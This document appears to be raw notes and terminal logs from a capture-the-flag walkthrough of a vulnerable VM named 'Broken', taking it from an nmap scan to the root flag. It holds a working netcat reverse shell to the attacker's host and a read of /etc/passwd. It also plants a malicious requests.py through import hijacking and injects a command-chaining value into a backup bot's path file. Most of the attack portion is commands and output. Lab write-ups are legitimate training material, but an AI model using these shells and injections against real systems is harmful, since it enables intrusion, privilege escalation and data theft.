hack@kali:~$ nmap -sC -sV -p- 192.168.1.232
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 11:30 CEST
Nmap scan report for broken.homenet.telecomitalia.it (192.168.1.232)
Host is up (0.0011s latency).
Not shown: 49688 filtered ports, 15845 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 7e:f3:33:8c:be:0c:ed:d7:0e:c6:67:cc:73:bf:c0:ab (RSA)
|   256 ee:ed:74:02:0d:3f:7d:6d:45:aa:ff:f3:3a:d0:1a:d9 (ECDSA)
|_  256 d1:18:a9:ef:7f:b6:c8:a9:30:52:c8:e6:b6:ec:64:80 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Coming Soon
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds


http://192.168.1.232/cms/
{FLAG1:**Defacement**}


http://192.168.1.232/cms/cc --> page to upload hack script
Create script with requested name:
hack@kali:~$ cat 92edf0fa5e9a3dd40438d27757a78283.sh 
#!/bin/bash

nc 192.168.1.44 1234 -e /bin/bash

Start python server to upload script:
hack@kali:~$ python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
192.168.1.232 - - [29/Apr/2020 12:16:00] "GET /92edf0fa5e9a3dd40438d27757a78283.sh HTTP/1.0" 200 -


Start nc listener:
hack@kali:~/CTF/Broken_2020$ nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.232.
Ncat: Connection from 192.168.1.232:46612.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Escape raw shell:
www-data@broken:/var/www/html/cms/cc$ ssttttyy  rraaww  --eecchhoo

www-data@broken:/var/www/html/cms/cc$ ls
e425ef56a6ca4a3101e775d5019fb237.txt  index.php  shell.sh
fe8b7cfd24a4ad396054c8cd2f44d296.py   log.txt
www-data@broken:/var/www/html/cms/cc

STUFF:
www-data@broken:/var/www/html/cms/cc$ cat e425ef56a6ca4a3101e775d5019fb237.txt
92edf0fa5e9a3dd40438d27757a78283

www-data@broken:/var/www/html/cms/cc$ cat fe8b7cfd24a4ad396054c8cd2f44d296.py
import requests
import os

file = open("e425ef56a6ca4a3101e775d5019fb237.txt", "r")
script=file.read()
file.close()


ip="test"
url="http://"+ip+"/"+script+".sh"



www-data@broken:/home/alice$ ls -la
total 48
drwxr-xr-x 5 alice alice 4096 Mar 26 16:17 .
drwxr-xr-x 3 root  root  4096 Mar 24 08:29 ..
lrwxrwxrwx 1 alice alice    9 Mar 24 16:50 .bash_history -> /dev/null
-rw-r--r-x 1 alice alice  220 Mar 24 08:29 .bash_logout
-rw-r--r-- 1 alice alice  570 Jan 31  2010 .bashrc
drwxr-xr-x 3 alice alice 4096 Mar 24 14:15 .cache
drwxr-xr-x 3 alice alice 4096 Mar 24 09:49 .local
-rw-r--r-- 1 alice alice  148 Aug 17  2015 .profile
-rw-r--r-- 1 alice alice   66 Mar 25 10:12 .selected_editor
-rw-r--r-- 1 alice alice  173 Mar 24 14:15 .wget-hsts
-rw-r--r-- 1 alice alice   29 Mar 25 18:59 flag.txt
-rw-r--r-- 1 alice alice  141 Mar 25 11:55 note.txt
drwxrwxrwx 2 alice alice 4096 Mar 26 16:17 script


www-data@broken:/home/alice$ cat flag.txt
{FLAG2:**Robing the rober**}


www-data@broken:/home/alice$ cat note.txt
Alice, 

Please do not install TrustMeCMS, I need check the source before

PS: I created a script to clear apache log during the tests

root


www-data@broken:/home/alice/script$ cat log.py
#!/usr/bin/python2.7
import requests
import os
import datetime

"""
#Juste in case I want stop this script remotly

r = requests.get("https://pastebin.com/raw/9vzu2CA5")

cmd=str(r.text)
check ="stopit"
if check == cmd :
        os.system('cp /home/alice/script/log.py /home/alice/script/log.bak')

"""


path="/var/log/apache2"
dir = os.listdir(path)
date = str(datetime.datetime.now())
for logfile in dir :
        clear = open(path+"/"+logfile, "w")
        clear.truncate(0)
        clear.close()
logfile = open("/home/alice/script/clear.log","w")
logfile.write("last clear apache log "+date)
logfile.close()


www-data@broken:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
smmta:x:107:115:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin
smmsp:x:108:116:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin


User:alice


### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/nc
/usr/bin/netcat
/usr/bin/wget
/usr/bin/curl




www-data@broken:/back/backup$ cat flag.txt
{FLAG3:**Power of snak**}


www-data@broken:/back/backup$ cat note.txt
Alice we have been hacked !

Please put the path of the website backup directory in path.txt, my bot will do the rest

thx

root





Stop log.py
https://pastebin.com/raw/9vzu2CA5


Create requests.py!!!!!
hack@kali:~$ cat requests.py 
import os


cmd = "chmod 777 -R /home/alice"
os.system(cmd)

cmd2 = "touch /home/alice/exp.sh && chmod +x /home/alice/exp.sh"
os.system(cmd2)

www-data@broken:/home/alice/script$ wget 192.168.1.44:8888/requests.py


path = /tmp && ls -la > /home/alice/root.txt && rsync -a

cmd = "rsync -a "+path+" /home/alice/backup --exclude back --exclude backup.py&& chown -R www-data:alice /home/alice/backup && chmod -R 777 /home/alice/backup"

echo "/tmp && ls -la > /home/alice/root.txt && rsync -a " >> path.txt


[INFO] 23:06:01 30/04/2020  : no path in path.txt
[SECURITY] 23:07:01 30/04/2020  :  [&] may be an attack attempt. To avoid this the script was interrupted 
[SECURITY] 23:08:01 30/04/2020  :  [&] may be an attack attempt. To avoid this the script was interrupted 

NOT WORKS!!


www-data@broken:/home/alice/script$ wget 192.168.1.44:8888/requests.py
--2020-04-30 23:44:39--  http://192.168.1.44:8888/requests.py
Connecting to 192.168.1.44:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 120 [text/plain]
Saving to: 'requests.py'

requests.py         100%[===================>]     120  --.-KB/s    in 0s      

2020-04-30 23:44:39 (1.15 MB/s) - 'requests.py' saved [120/120]


hack@kali:~/CTF/Broken_2020$ nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 192.168.1.232.
Ncat: Connection from 192.168.1.232:45724.
id
uid=1000(alice) gid=1000(alice) groupes=1000(alice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)


MOdify path.txt  file: --> add /root

alice@broken:~/backup/root$ cat test.py
cat test.py
cmd ="ls"

list =['a','s', 'l']


hack = cmd.count(list)

if hack == 1 :
        print("prevent injection on")

alice@broken:~/backup/root$ cat flag.txt
cat flag.txt
Congratulation for the root flag !

     _________
    / ======= \
   / __________\
  | ___________ |
  | | -root-  | |
  | |         | |
  | |_________| |_____________________________________________________________________
  \=____________/                     enjoyed this VM ?                               )
  / """"""""""" \                     I love bitcoin                                 /
 / ::::::::::::: \           1Ba6vFEamUenzrXr4scGQ8QLya7t7zYZ1S                  =D-'
(_________________)


alice@broken:~/backup/root$ 

